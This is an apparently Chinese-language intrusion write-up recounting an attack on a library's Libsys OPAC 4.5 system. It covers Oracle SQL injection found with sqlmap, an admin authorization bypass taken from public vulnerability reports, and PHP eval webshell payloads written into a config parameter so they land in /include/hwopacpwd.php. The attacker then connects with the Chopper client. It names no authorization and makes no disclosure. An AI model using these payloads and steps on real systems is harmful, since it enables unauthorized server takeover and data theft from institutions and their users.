0x00 前言
对某图书馆系统一次检测
0x01 ***
- 访问该网站时,发现自动跳转到/opac/search.php,且下方有公司信息,可以判定该系统为Libsys图书管理系统,且版本为4.5
![对某图书馆***一次笔记]()
2.通过乌云镜像站的搜索,我们发现该图书管理系统存在挺多漏洞,但本次***过程中遇到的情况与图中的漏洞略有差异点
3.通过搜索,发现一处注入点,为Oracle注入,使用sqlmap很快速的就检测出
4.经过一番捣鼓后,本想常规思路通过数据库找到后台账号密码登录,但发现后台账号密码不在数据库中,只能另辟蹊径,发现另一篇文章http://wooyun.chamd5.org/bug_detail.php?wybug_id=wooyun-2014-085980 提到的权限绕过,但存在一些差异
5.访问成功绕过
6.根据文章中所提到修改索引文件夹路径中参数,因为该参数是写在另一个文件中,只要将该参数写webshell,那么就会修改该php文件中内容,只要访问/include/hwopacpwd.php该文件即可!
利用代码为:
c:/hwopac/index/";@eval($_POST[131514]);//保存后,发现访问失败,发现是该参数并没有写入文件中
7.在参考另外一篇文章https://joychou.org/web/huiwen-libsys.html 分析后
发现其实该页面中保存的参数不仅只有路径是会写入,其他参数也会写入,那么可以考虑对其他参数进行webshell的写入
8.构造user参数payload
该项为高危操作,因为写入内容到php文件,如果因为失误导致语法错误等问题,则可能将影响服务器正常运作!查看了文章分析后,发现配置文件中的信息情况
那么本地将语法调通,再将payload放上,确保万无一失
xxxx";@eval($_POST[123]);//
9.保存后,再次使用菜刀连接webshell
10.连上去查看hwopacpwd.php文件后,才发现原来该文件中并没有路径参数,也就是没保存该参数值进去,才导致写入失败